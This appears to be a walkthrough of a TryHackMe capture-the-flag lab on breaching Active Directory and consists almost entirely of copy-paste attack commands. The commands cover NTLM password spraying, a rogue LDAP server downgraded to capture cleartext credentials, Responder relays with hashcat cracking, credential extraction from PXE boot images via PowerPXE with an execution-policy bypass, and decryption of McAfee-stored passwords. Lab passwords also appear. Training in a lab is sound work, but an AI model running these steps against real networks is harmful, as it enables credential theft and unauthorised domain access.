Room Link: https://tryhackme.com/room/breachingad
Introduction to AD Breaches
Kali
Copy systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com
nslookup thmdc.za.tryhackme.com NTLM Authenticated Services
Kali
Copy unzip passwordsprayer.zip
python /root/Rooms/BreachingAD/task3/ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a "http://ntlmauth.za.tryhackme.com"
LDAP Bind Credentials
Kali
Copy service slapd stop
nc -lvp 389 Hosting a Rogue LDAP Server
Kali
Copy sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd Kali
Copy vi olcSaslSecProps.ldif
olcSaslSecProps.ldif
Copy dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred The file has the following properties:
olcSaslSecProps: Specifies the SASL security properties
noanonymous: Disables mechanisms that support anonymous login
minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.
Now we can use the ldif file to patch our LDAP server using the following:
Kali
Copy sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms Before
After
Capturing LDAP Credentials
Our rogue LDAP server has now been configured. When we click the "Test Settings" at http://printer.za.tryhackme.com/settings.aspx , the authentication will occur in clear text. If you configured your rogue LDAP server correctly and it is downgrading the communication, you will receive the following error: "This distinguished name contains invalid syntax". If you receive this error, you can use a tcpdump to capture the credentials using the following command:
Kali
Copy sudo tcpdump -SX -i breachad tcp port 389
Authentication Relays
Kali
Copy sudo service slapd stop
sudo responder -I breachad Kali
Copy hashcat -m 5600 hash.txt passwordlist.txt --force
hashcat -m 5600 hash.txt passwordlist.txt --force --show Microsoft Deployment Toolkit
Kali
Copy ssh thm@THMJMP1.za.tryhackme.com
Password: Password1@ Victim
Copy cd Documents
mkdir thm
copy C:\powerpxe thm
cd thm Victim
Copy tftp -i $THMMDTIP GET "\Tmp\x64{39...28}.bcd" conf.bcd Victim
Copy powershell -executionpolicy bypass
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile Victim
Copy tftp -i $THMMDTIP GET "<PXE Boot Image Location>" pxeboot.wim Victim
Copy Get-FindCredentials -WimFile pxeboot.wim Configuration Files
Victim
Copy cd C:\ProgramData\McAfee\Agent\DB Victim
Copy scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
Password: Password1@ Kali
Kali
Copy cp /root/Rooms/BreachingAD/task7/mcafeesitelistpwddecryption.zip .
unzip mcafeesitelistpwddecryption.zip Kali
Copy python2 mcafee-sitelist-pwd-decryption-master/mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== a
